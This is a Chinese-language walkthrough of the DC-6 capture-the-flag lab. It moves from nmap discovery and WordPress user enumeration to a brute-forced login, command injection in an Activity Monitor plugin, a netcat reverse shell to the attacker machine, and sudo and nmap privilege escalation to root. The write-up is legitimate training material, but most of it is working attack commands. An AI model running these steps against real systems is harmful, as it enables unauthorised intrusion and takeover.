先对内网进行探活扫描
nmap -sn 192.168.207.0/24dc-6的ip是192.168.207.136,进行端口扫描
nmap -sV -p- 192.168.207.136有两个端口22(ssh)80(http),先上浏览器访问http://192.168.207.136查看一下网站内容
修改hosts文件
nano /etc/hosts192.168.207.136 wordy重新访问http://wordy
用的wordpress框架,进行目录扫描
dirsearch -u http://wordy找到了wp-login.php
使用wpscan获取用户名
wpscan --url http://wordy -e u有admin、mark、graham、sarah、jens五个账户,等会可以考虑ssh
接下来破解密码,使用kali自带的rockyou.txt
这个需要先解压
cd /usr/share/wordlistsgzip -d rockyou.txt.gzmv rockyou.txt /home/kali因为rockyou太大了,要大约尝试71721960次,我后来查看靶机官网,提示我们使用以下命令
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txtgrep k01 > passwords.txt:查找包含字符串 k01 的行,重定向输出到文件
等于是给我们缩小爆破范围,但是实际爆破肯定是没有这个信息的,或者需要我们自己去收集这个信息
在/home/kali目录下进行密码破解
wpscan --url http://wordy --passwords passwords.txt跑出mark / helpdesk01
登录看看
成功进入后台
查看网页功能发现Activity monitor > Tools里输入ip后,点击lookup后有回显
可以考虑rce远程命令注入
想要输入其他命令发现不能输入,有字数限制
打开f12,框选输入框
将maxlength改为150就可以了
写反弹shell到kali终端上
nc -lvvp 6666nc 192.168.207.128 6666 -e /bin/bashpython -c 'import pty;pty.spawn("/bin/bash")'切换到home目录
查看mark目录有什么
查看things-to-do.txt
cat things-to-do.txt恢复超空间驱动器的全部功能(需要与Jens沟通)
为Sarah的欢送会购买礼物
新增用户:graham - GSo7isUM1D4 - 已完成
申请OSCP课程
为Sarah的接替者购买新笔记本电脑
这里可知graham / GSo7isUM1D4
ssh graham@192.168.207.136 -p 22查看当前用户可执行操作
sudo -l可以操作backups.sh,但是要切换到jens用户来执行
echo "/bin/bash" >> /home/jens/backups.sh将/bin/bash追加写入到backups.sh中
sudo -u jens /home/jens/backups.shsudo -u jens:以jens用户身份来执行后面的命令
sudo -lnmap可以以root身份执行
搜索nmap提权
TF=$(mktemp)echo 'os.execute("/bin/sh")' > $TFsudo nmap --script=$TFwhoamicat theflag.txt渗透测试成功